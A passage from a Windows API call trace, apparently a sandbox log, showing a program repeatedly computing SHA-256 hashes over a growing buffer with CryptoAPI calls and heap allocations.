pbData=0x32e4ee50, dwDataLen=0x300, dwFlags=0x0) returned 1 [0147.931] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.931] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a500 [0147.931] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a500, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a500, pdwDataLen=0xceaec) returned 1 [0147.932] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.932] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0147.932] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0147.932] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.932] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x320, dwFlags=0x0) returned 1 [0147.932] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.932] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a530 [0147.932] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a530, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a530, pdwDataLen=0xceaec) returned 1 [0147.932] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.932] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0147.932] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338236d0) returned 1 [0147.933] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.933] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x340, dwFlags=0x0) returned 1 [0147.933] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.933] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a680 [0147.933] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a680, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a680, pdwDataLen=0xceaec) returned 1 [0147.933] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.933] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0147.933] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823ad0) returned 1 [0147.933] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.934] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x360, dwFlags=0x0) returned 1 [0147.934] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.934] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a650 [0147.934] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a650, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a650, pdwDataLen=0xceaec) returned 1 [0147.934] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.934] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0147.934] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0147.934] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.934] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x380, dwFlags=0x0) returned 1 [0147.934] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.934] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59e40 [0147.934] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e59e40, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e59e40, pdwDataLen=0xceaec) returned 1 [0147.934] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.934] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0147.934] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338229d0) returned 1 [0147.935] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.935] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0147.935] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.935] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59b10 [0147.935] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e59b10, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e59b10, pdwDataLen=0xceaec) returned 1 [0147.935] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.935] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0147.935] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821fd0) returned 1 [0147.936] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.936] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0147.936] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.936] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59f30 [0147.936] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e59f30, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e59f30, pdwDataLen=0xceaec) returned 1 [0147.936] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.936] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0147.936] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822fd0) returned 1 [0147.936] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.936] CryptHashData (hHash=0x332b7a50, pbData=0x32e4ee50, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0147.937] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.937] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a6b0 [0147.937] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e5a6b0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a6b0, pdwDataLen=0xceaec) returned 1 [0147.937] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0147.937] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0147.937] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823ad0) returned 1 [0147.937] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.937] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x400, dwFlags=0x0) returned 1 [0147.937] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.937] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59c00 [0147.937] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e59c00, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e59c00, pdwDataLen=0xceaec) returned 1 [0147.937] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.937] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0147.937] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338220d0) returned 1 [0147.938] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.938] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x420, dwFlags=0x0) returned 1 [0147.938] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.938] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b070 [0147.938] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b070, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b070, pdwDataLen=0xceaec) returned 1 [0147.938] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.938] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0147.938] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338220d0) returned 1 [0147.939] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.939] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x440, dwFlags=0x0) returned 1 [0147.939] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.939] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5af80 [0147.939] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5af80, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5af80, pdwDataLen=0xceaec) returned 1 [0147.939] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.939] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0147.939] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338235d0) returned 1 [0147.939] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.939] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0x460, dwFlags=0x0) returned 1 [0147.939] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.939] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5acb0 [0147.939] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x2, pbData=0x32e5acb0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5acb0, pdwDataLen=0xceaec) returned 1 [0147.939] CryptDestroyHash (hHash=0x332b7970) returned 1 [0147.939] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0147.939] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823bd0) returned 1 [0147.940] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.940] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x480, dwFlags=0x0) returned 1 [0147.940] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.940] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b040 [0147.940] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5b040, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b040, pdwDataLen=0xceaec) returned 1 [0147.940] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.940] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0147.940] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338235d0) returned 1 [0147.941] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.941] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0147.941] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.941] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ab60 [0147.941] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x2, pbData=0x32e5ab60, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5ab60, pdwDataLen=0xceaec) returned 1 [0147.941] CryptDestroyHash (hHash=0x332b7970) returned 1 [0147.941] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0147.941] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0147.941] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.941] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0147.941] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.941] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5aaa0 [0147.941] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5aaa0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5aaa0, pdwDataLen=0xceaec) returned 1 [0147.942] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.942] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0147.942] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ed0) returned 1 [0147.942] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.942] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0147.942] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.942] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a740 [0147.942] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a740, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a740, pdwDataLen=0xceaec) returned 1 [0147.942] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.942] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0147.942] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338239d0) returned 1 [0147.943] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.943] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x500, dwFlags=0x0) returned 1 [0147.943] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.943] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a860 [0147.943] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a860, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a860, pdwDataLen=0xceaec) returned 1 [0147.943] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.943] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0147.943] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338222d0) returned 1 [0147.943] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.944] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x520, dwFlags=0x0) returned 1 [0147.944] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.944] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ab90 [0147.944] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5ab90, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5ab90, pdwDataLen=0xceaec) returned 1 [0147.944] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.944] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0147.944] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0147.944] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.944] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x540, dwFlags=0x0) returned 1 [0147.944] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.944] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ace0 [0147.944] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5ace0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5ace0, pdwDataLen=0xceaec) returned 1 [0147.944] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.944] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0147.944] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822bd0) returned 1 [0147.945] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.945] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x560, dwFlags=0x0) returned 1 [0147.945] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.945] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a770 [0147.945] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a770, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a770, pdwDataLen=0xceaec) returned 1 [0147.945] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.945] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0147.945] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338227d0) returned 1 [0147.946] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.946] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0x580, dwFlags=0x0) returned 1 [0147.946] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.946] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ac20 [0147.946] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x2, pbData=0x32e5ac20, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5ac20, pdwDataLen=0xceaec) returned 1 [0147.946] CryptDestroyHash (hHash=0x332b7970) returned 1 [0147.946] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0147.946] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338233d0) returned 1 [0147.951] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.951] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0147.951] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.951] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b2e0 [0147.951] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b2e0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b2e0, pdwDataLen=0xceaec) returned 1 [0147.951] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.951] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0147.951] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0147.952] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.952] CryptHashData (hHash=0x332b77b0, pbData=0x32e4ee50, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0147.952] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.952] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5afb0 [0147.952] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e5afb0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5afb0, pdwDataLen=0xceaec) returned 1 [0147.952] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0147.952] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0147.952] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ad0) returned 1 [0147.952] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.952] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0147.952] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.952] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b190 [0147.952] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b190, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b190, pdwDataLen=0xceaec) returned 1 [0147.952] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.952] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0147.952] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821dd0) returned 1 [0147.953] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.953] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x600, dwFlags=0x0) returned 1 [0147.953] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.953] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ada0 [0147.953] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5ada0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5ada0, pdwDataLen=0xceaec) returned 1 [0147.953] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.953] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0147.953] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ed0) returned 1 [0147.954] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.954] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x620, dwFlags=0x0) returned 1 [0147.954] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.954] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a8f0 [0147.954] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, 